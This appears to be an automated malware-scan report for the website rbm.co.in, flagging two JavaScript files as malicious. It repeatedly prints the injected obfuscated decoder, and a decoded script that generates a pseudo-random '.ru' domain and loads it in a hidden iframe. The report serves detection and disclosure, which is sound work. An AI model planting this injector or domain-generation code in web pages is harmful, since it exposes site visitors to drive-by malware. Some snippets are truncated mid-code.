Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rbm.co.in
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.rbm.co.in/ | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
| ||
http://www.rbm.co.in/index.html | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/html/Contact_Us.html | 200 OK Content-Length: 28184 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/html/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
| ||
http://www.rbm.co.in/html/../index.html | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/Contact_Us.html | 200 OK Content-Length: 28184 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/html/../html/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
| ||
http://www.rbm.co.in/html/../html/../index.html | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/../html/Contact_Us.html | 200 OK Content-Length: 28184 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/../html/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/html/../html/../html/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rbm.co.in
Result:
GET / HTTP/1.1
Host: rbm.co.in
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rbm.co.in
Referer: http://www.google.com/search?q=rbm.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rbm.co.in
Referer: http://www.google.com/search?q=rbm.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.